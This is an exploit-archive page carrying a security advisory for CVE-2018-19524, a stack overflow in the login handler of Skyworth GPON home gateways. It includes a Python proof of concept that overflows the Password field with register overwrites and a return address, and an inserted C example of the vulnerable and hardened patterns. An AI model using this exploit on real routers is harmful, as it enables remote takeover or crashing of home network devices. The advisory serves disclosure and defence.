
Skyworth GPON HomeGateways and Optical Network Terminals - Stack Overflow

Author: Kaustubh G. Padwad
Platform: asp
Release date: 2019-02-12

Related exploits (platform: asp)

Release Date Title Type Platform Author
2019-05-06 "microASP (Portal+) CMS - 'pagina.phtml?explode_tree' SQL Injection" webapps asp "felipe andrian"
2019-02-12 "Skyworth GPON HomeGateways and Optical Network Terminals - Stack Overflow" dos asp "Kaustubh G. Padwad"
2018-11-05 "Advantech WebAccess SCADA 8.3.2 - Remote Code Execution" webapps asp "Chris Lyne"
2018-05-29 "IssueTrak 7.0 - SQL Injection" webapps asp "Chris Anastasio"
2018-05-24 "ASP.NET jVideo Kit - 'query' SQL Injection" webapps asp AkkuS
2018-05-16 "totemomail Encryption Gateway 6.0.0 Build 371 - Cross-Site Request Forgery" webapps asp "Compass Security"
2018-03-30 "Tenda W3002R/A302/w309r Wireless Router v5.07.64_en - Remote DNS Change (PoC)" webapps asp "Todor Donev"
2018-03-30 "Tenda FH303/A300 Firmware v5.07.68_EN - Remote DNS Change" webapps asp "Todor Donev"
2018-03-30 "Tenda W316R Wireless Router 5.07.50 - Remote DNS Change" webapps asp "Todor Donev"
2018-03-30 "Tenda W308R v2 Wireless Router 5.07.48 - Cookie Session Weakness Remote DNS Change" webapps asp "Todor Donev"
2017-08-31 "Sitefinity CMS 9.2 - Cross-Site Scripting" webapps asp "Pralhad Chaskar"
2017-09-22 "JitBit HelpDesk < 9.0.2 - Authentication Bypass" webapps asp Kc57
2017-09-18 "DigiAffiliate 1.4 - Cross-Site Request Forgery (Update Admin)" webapps asp "Ihsan Sencan"
2017-09-18 "Digileave 1.2 - Cross-Site Request Forgery (Update Admin)" webapps asp "Ihsan Sencan"
2017-09-18 "Digirez 3.4 - Cross-Site Request Forgery (Update Admin)" webapps asp "Ihsan Sencan"
2017-09-13 "ICAffiliateTracking 1.1 - Authentication Bypass" webapps asp "Ihsan Sencan"
2017-06-05 "Kronos Telestaff < 2.92EU29 - SQL Injection" webapps asp "Goran Tuzovic"
2018-02-16 "EPIC MyChart - X-Path Injection" webapps asp "Shayan S"
2015-09-28 "Kaseya Virtual System Administrator (VSA) 7.0 < 9.1 - (Authenticated) Arbitrary File Upload" webapps asp "Pedro Ribeiro"
2014-08-23 "LiveWorld Multiple Products - Cross Site Scripting" webapps asp "GulfTech Security"
2003-12-18 "ASPapp Multiple Products - Multiple Vulnerabilities" webapps asp "GulfTech Security"
2003-12-15 "DUWare Multiple Products - Multiple Vulnerabilities" webapps asp "GulfTech Security"
2016-06-07 "Cisco EPC 3928 - Multiple Vulnerabilities" webapps asp "Patryk Bogdan"
2016-06-06 "Notilus Travel Solution Software 2012 R3 - SQL Injection" webapps asp "Alex Haynes"
2016-05-24 "AfterLogic WebMail Pro ASP.NET 6.2.6 - Administrator Account Disclosure via XML External Entity Injection" webapps asp "Mehmet Ince"
2016-05-06 "DotNetNuke 07.04.00 - Administration Authentication Bypass" webapps asp "Marios Nicolaides"
2016-02-22 "Thru Managed File Transfer Portal 9.0.2 - SQL Injection" webapps asp "SySS GmbH"
2016-01-13 "WhatsUp Gold 16.3 - Remote Code Execution" webapps asp "Matt Buzanowski"
2014-05-16 "CIS Manager - 'email' SQL Injection" webapps asp Edge
2014-02-22 "eshtery CMS - 'FileManager.aspx' Local File Disclosure" webapps asp peng.deng
Other exploits by this author

Release Date Title Type Platform Author
2019-02-12 "Skyworth GPON HomeGateways and Optical Network Terminals - Stack Overflow" dos asp "Kaustubh G. Padwad"
2016-02-16 "ManageEngine Network Configuration Management Build 11000 - Privilege Escalation" webapps multiple "Kaustubh G. Padwad"
2016-02-16 "ManageEngine OPutils 8.0 - Multiple Vulnerabilities" webapps multiple "Kaustubh G. Padwad"
2016-02-02 "Manage Engine Network Configuration Manager Build 11000 - Cross-Site Request Forgery" webapps multiple "Kaustubh G. Padwad"
2015-05-08 "WordPress Plugin Ad Inserter 1.5.2 - Cross-Site Request Forgery" webapps php "Kaustubh G. Padwad"
2015-05-08 "Manage Engine Asset Explorer 6.1.0 Build: 6110 - Cross-Site Request Forgery" webapps windows "Kaustubh G. Padwad"
2015-05-08 "WordPress Plugin ClickBank Ads 1.7 - Cross-Site Request Forgery" webapps php "Kaustubh G. Padwad"
2015-05-08 "WordPress Plugin Ultimate Profile Builder 2.3.3 - Cross-Site Request Forgery" webapps php "Kaustubh G. Padwad"
import requests
response = requests.get('https://www.nmmapper.com/api/exploitdetails/46358/?format=json')

Response body:
{"url": "https://www.nmmapper.com/api/exploitdetails/46358/?format=json", "download_file": "https://www.nmmapper.com/st/exploitdetails/46358/40802/skyworth-gpon-homegateways-and-optical-network-terminals-stack-overflow/download/", "exploit_id": "46358", "exploit_description": "\"Skyworth GPON HomeGateways and Optical Network Terminals - Stack Overflow\"", "exploit_date": "2019-02-12", "exploit_author": "\"Kaustubh G. Padwad\"", "exploit_type": "dos", "exploit_platform": "asp", "exploit_port": null}

'''
=======================================================
Unauthenticated Stack Overflow in Multiple GPON Devices
=======================================================

.. contents:: Table of Contents

Overview
========

Title: Stack Overflow in Multiple Skyworth GPON Home Gateways and Optical Network Terminals
CVE-ID: CVE-2018-19524
Author: Kaustubh G. Padwad
Vendor: Shenzhen Skyworth Digital Technology Company Ltd. (http://www.skyworthdigital.com/products)
Products:
  1. DT741 Converged Intelligent Terminal (G/EPON+IPTV)
  2. DT741 Converged Intelligent Terminal (G/EPON+IPTV)
  3. DT721-cb GPON uplink home gateway (GPON+2FE+1POTS)
  4. DT721-cb GPON Uplink Home Gateway (GPON+2FE+1POTS)
  5. DT741-cb GPON uplink home gateway (GPON+4FE+1POTS+WIFI+USB)
  6. DT741-cb GPON Uplink Home Gateway (GPON+4FE+1POTS+WIFI+USB)
  7. DT741-cb GPON uplink home gateway DT741-cb


Tested Version: Multiple versions
Severity: High to Critical

Advisory ID
============
KSA-Dev-001

About the Product:
==================

* Each of the products listed above is a high-performance GPON access gateway that complies with the ITU-T G.984 and CTC standards.
* Configured with one GPON optical interface, two FEs and one POTS port.
* Provides Ethernet, VoIP and other interfaces to meet the access requirements of different devices.
* Provides high-performance broadband access services for home users, individual users and SOHO small businesses.
* Supports the standard TR-069 protocol, which can be flexibly customized for the carrier network and is compatible with mainstream OLT, softswitch and service management platforms.

Description: 
============
An issue was discovered on Shenzhen Skyworth DT741 Converged Intelligent Terminal (G/EPON+IPTV) SDOTBGN1, DT721-cb SDOTBGN1, and DT741-cb SDOTBGN1 devices.
A long password passed to the Web_passwd function allows remote attackers to cause a denial of service (segmentation fault) or
achieve unauthenticated remote code execution, because the overflow gives control of registers
S0 through S4 and T4 through T7.


Additional Information
========================
The password value handled by the Web_passwd function is not length-checked, so sending an oversized value in the password parameter triggers a SIGSEGV (segmentation fault) on the device. Further research showed that
the registers S0-S4 and T4-T7 can be controlled, so successful exploitation could lead to unauthenticated remote code execution on the device.
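The flaw described above is the classic pattern of an unbounded copy of a request field into a fixed-size stack buffer. The following C example is added here for illustration and is neither the vendor's firmware nor the advisory's PoC: it sketches that pattern beside a hardened form that measures the Password field of the URL-encoded body and rejects over-long values before any copy. The names web_passwd_unbounded, web_passwd_checked, form_field_len, build_login_body and the PASSWD_MAX size are assumptions for the example, not identifiers from the device; form_field_len is also the kind of length check a reverse proxy or IDS in front of such a device could apply to flag oversized login bodies.

```c
/* Added example (not the vendor's code or the advisory's PoC). All names below are
 * hypothetical: they illustrate the pattern described in the advisory, not real firmware. */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define PASSWD_MAX 64   /* hypothetical size of the fixed stack buffer */

/* Vulnerable pattern, shown for contrast and never called in this example: the value is
 * copied into a fixed-size stack buffer with no length check, so an over-long Password=
 * value runs past the buffer into saved registers and the return address, which is the
 * crash / code-execution condition the advisory describes. */
void web_passwd_unbounded(const char *password)
{
    char buf[PASSWD_MAX];
    strcpy(buf, password);              /* no bound: classic stack overflow */
    (void)buf;
}

/* Locate a field in an application/x-www-form-urlencoded body. Returns a pointer to the
 * start of the value and stores its length in *len, or NULL if the field is absent.
 * A match must start at the body or right after '&' and be followed by '=', so a lookup
 * for "Password" does not match "Password1=". */
static const char *form_field(const char *body, const char *name, size_t *len)
{
    size_t nlen = strlen(name);
    const char *p = body;

    while (p && *p) {
        if (strncmp(p, name, nlen) == 0 && p[nlen] == '=') {
            const char *v = p + nlen + 1;
            const char *end = strchr(v, '&');
            *len = end ? (size_t)(end - v) : strlen(v);
            return v;
        }
        p = strchr(p, '&');
        if (p)
            p++;
    }
    return NULL;
}

/* Length of the named field's value, or -1 if the field is missing. */
long form_field_len(const char *body, const char *name)
{
    size_t len;
    return form_field(body, name, &len) ? (long)len : -1;
}

/* Hardened form: enforce the limit before any copy and fail closed.
 * Returns 0 on success, -1 if Password is missing, -2 if it exceeds the limit
 * (rejected outright rather than silently truncated, so the event can be logged). */
int web_passwd_checked(const char *body, char *out, size_t outsz)
{
    size_t len;
    const char *v = form_field(body, "Password", &len);

    if (!v)
        return -1;
    if (len >= outsz || len >= PASSWD_MAX)
        return -2;
    memcpy(out, v, len);
    out[len] = '\0';
    return 0;
}

/* Build a constructed login body whose Password value is password_len 'A' bytes.
 * Caller frees the result. Shows an over-long input without any payload bytes. */
char *build_login_body(const char *user, size_t password_len)
{
    const char *prefix = "Username=";
    const char *mid = "&Logoff=0&LoginTimes=1&Password=";
    size_t n = strlen(prefix) + strlen(user) + strlen(mid) + password_len + 1;
    char *body = malloc(n);
    if (!body)
        return NULL;
    snprintf(body, n, "%s%s%s", prefix, user, mid);
    memset(body + strlen(body), 'A', password_len);
    body[n - 1] = '\0';
    return body;
}

int main(void)
{
    char out[PASSWD_MAX];
    /* constructed sample bodies */
    const char *ok = "Username=admin&Logoff=0&Password1=xss&Password=secret&logintype=usr";
    char *bad = build_login_body("admin", 999);   /* 999 bytes, the padding length in the PoC */

    printf("normal login: rc=%d value=%s\n", web_passwd_checked(ok, out, sizeof out), out);
    printf("over-long login: rc=%d (Password length %ld)\n",
           web_passwd_checked(bad, out, sizeof out), form_field_len(bad, "Password"));
    free(bad);
    return 0;
}
```

The hardened function refuses the request instead of truncating: a silently truncated password would hide the anomaly, whereas a rejected 999-byte login is exactly the event worth logging and alerting on.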


[Affected Component]
The web_passwd function inside the device's boa web server implementation.

------------------------------------------
[Attack Type]
Remote
------------------------------------------
[Impact Code execution]
true
------------------------------------------
[Impact Denial of Service]
true

------------------------------------------
[Attack Vectors]
Remote code execution by running poc.py (the PoC below) against the target IP address.

[Vulnerability Type]
====================
Buffer Overflow, Exec

How to Reproduce (PoC):
=======================

One can use the exploit below:
'''

import socket
import struct

buf = "POST /cgi-bin/index2.asp  HTTP/1.1\r\nHOST: 192.168.1.1\r\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: en-US,en;q=0.5\r\nAccept-Encoding: gzip, deflate\r\nReferer: http://192.168.1.2/cgi-bin/index2.asp\r\nCookie: LoginTimes=0\r\nConnection: Close\r\nUpgrade-Insecure-Requests: 1\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: 1714\r\n\n"
buf+="Username=Bufferoverflow"
buf+="&Logoff=0" 
buf+="&LoginTimes=1"
buf+="&LoginTimes_Zero=0"
buf+="&value_one=1"
buf+="&Password1=xss"
buf+="&Password2=xss"
buf+="&logintype=usr"
buf+="&Password="
buf+="A"*999 #Padding till T4
buf+="T4T4" #T4 Address 0x2BB30D5C kill address based on libc
buf+="T7T7" #T7 sleep address based on libc
buf+="B"*9 #Padding till T6
buf+= "T6T6" #T6 Address Sleep Address Based on libc negative
buf+="K"*8 #Padding between T6 to S0
buf+="S0S0" #S0 Address sleep address boa positive
buf+="S1S1" #S1 Address Sleep Address Boa negative
buf+="S2S2" #S2 Address Normal Sleep Address
buf+="S3S3" #S3 Address System Address
buf+="\xA0\x0E\xA2\x18" #return Address
buf+="K"*600


print buf
print "[+] sending buffer size", len(buf)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("192.168.1.1", 80))
s.send(buf)

'''
Mitigation
==========

No official mitigation received from vendor.

[Vendor of Product]
Shenzhen Skyworth Digital Technology Company Ltd.(http://www.skyworthdigital.com/products)

Disclosure: 
===========
01-Nov-2018 Discovered the vulnerability
03-Nov-2018 Reported to vendor (No response)
13-Nov-2018 Follow-up 01 (No response)
24-Nov-2018 Requested CVE ID(s)
26-Nov-2018 CVE assigned by MITRE

Credits:
========
* Kaustubh Padwad
* Information Security Researcher
* kingkaustubh@me.com
* https://s3curityb3ast.github.io/
* https://twitter.com/s3curityb3ast
* http://breakthesec.com
* https://www.linkedin.com/in/kaustubhpadwad
'''